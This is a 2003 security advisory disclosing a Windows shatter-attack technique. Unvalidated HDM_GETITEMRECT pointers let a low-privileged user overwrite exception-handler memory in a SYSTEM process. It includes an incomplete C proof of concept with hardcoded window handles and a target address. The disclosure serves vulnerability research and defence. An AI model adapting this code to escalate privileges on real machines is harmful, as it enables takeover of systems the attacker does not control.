|
========================================================================= = Shattering SEH = = brett.moore@security-assessment.com = http://www.security-assessment.com = = Originally posted: July 11, 2003 ========================================================================= == Background == Since shatter attacks are the bug of the week, I figured I would add some slightly interesting information to the topic. I'm not going to rehash the information that is already available, and for those who haven't yet read the following two articles. NGSSoftware Insight Security Research Advisory *http://www.ngssoftware.com/advisories/utilitymanager.txt iDEFENSE Security Advisory *http://www.idefense.com/advisory/07.11.03.txt Those two papers have all the required reading information and links to the previous shatter attack papers, detailing the use of a callback function to gain control of an interactive SYSTEM level process. The technique I am going to describe here is a method allowing a low level user to overwrite important memory locations in a SYSTEM process. Memory locations such as SEH etc. == Detail == Various windows messages accept a pointer to a POINT or RECT structure which will be used to retrieve GDI information about windows. These pointers do not appear to be validated in any way. We will concentrate on the HDM_GETITEMRECT message. (From MSDN) - HDM_GETITEMRECT Message - - Retrieves the bounding rectangle for a given item in a header control. - You can send this message explicitly or use the Header_GetItemRect macro. - - Syntax - - To send this message, call the SendMessage function as follows. - lResult = SendMessage((HWND) hWndControl, // handle to control - (UINT) HDM_GETITEMRECT, // message ID - (WPARAM) wParam, // = (WPARAM) (int) iIndex; - (LPARAM) lParam ); // = (LPARAM) (RECT*) lpItemRect; - Parameters - iIndex - Zero-based index of the header control item for which to retrieve the - bounding rectangle. - lpItemRect - Pointer to a RECT structure that receives the bounding rectangle information. - (End MSDN) So if we wanted to overwrite the Unhandled Exception Filter @ 77edxxxx we would call SendMessage(hwnd,HDM_GETITEMRECT,0,0x77edxxxx) Now the challenge is how do we control what is been written to the address. The RECT structure is defined as; (From MSDN) - typedef struct _RECT { - LONG left; - LONG top; - LONG right; - LONG bottom; - } RECT, *PRECT; (End MSDN) The only variable that we are in control of is the right, or width of the header item. The size is limited though, allowing us only to control the low order 16 bits of the written value. The high order bits are set to 0000. But by offsetting our write address we can control the high order 16 bits of the required value, with the low order bits been set to 0000. If we can place our shellcode in a place that includes XXXX0000 in the address then we will be able to land in our shellcode by setting the header item width to XXXX, causing the write and then causing an exception. Pictures are worth a thousand words, so work through this example. == Example Code == /******************************************************* * shatterseh.c * * Example code to demonstrate more shatter attacks * * Demonstrates overwriting of critical memory address * It is example only and doesn't reach the 'shellcode' * because header sizing is required. * * Obviously you need to insert the particular window * handles required. * * Compatible with my win2k SP3. * * Brett Moore [ brett.moore@security-assessment.com ] * www.security-assessment.com *******************************************************/ #include <windows.h> #include <commctrl.h> int main(int argc, char *argv[]) { long lResult; long hWndControl,hHdrControl; char buffer[65535]; // Stuff The Buffer memset(buffer,0x04,sizeof(buffer)); // Window Title Handle hWndControl = 0x000C01E6; // Set The Window Title lResult = SendMessage((HWND) hWndControl,(UINT) WM_SETTEXT,0,&buffer); // Listview Header Handle hWndControl = 0x000E0274; // Overwrite Something Important lResult = SendMessage((HWND) hWndControl,(UINT) HDM_GETITEMRECT,0,0x77EDA1EA); // Cause Exception lResult = SendMessage((HWND) hWndControl,(UINT) HDM_GETITEMRECT,0,1); return 0; } == Example Vulnerable Programs == None are included here. But other researchers are sure to release the usual list of suspects. == Solutions == See the iDEFENSE paper for some good solution examples. == Credit == Credit given where due to all previous shatter attack posts/publications. Brett Moore from security-assessment.com for the discovery/disclosure of this method. %-) Wassup to all those who have helped me by not helping me in the past. %-) This California life-style is treating me well. Bring on Vegas! == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products.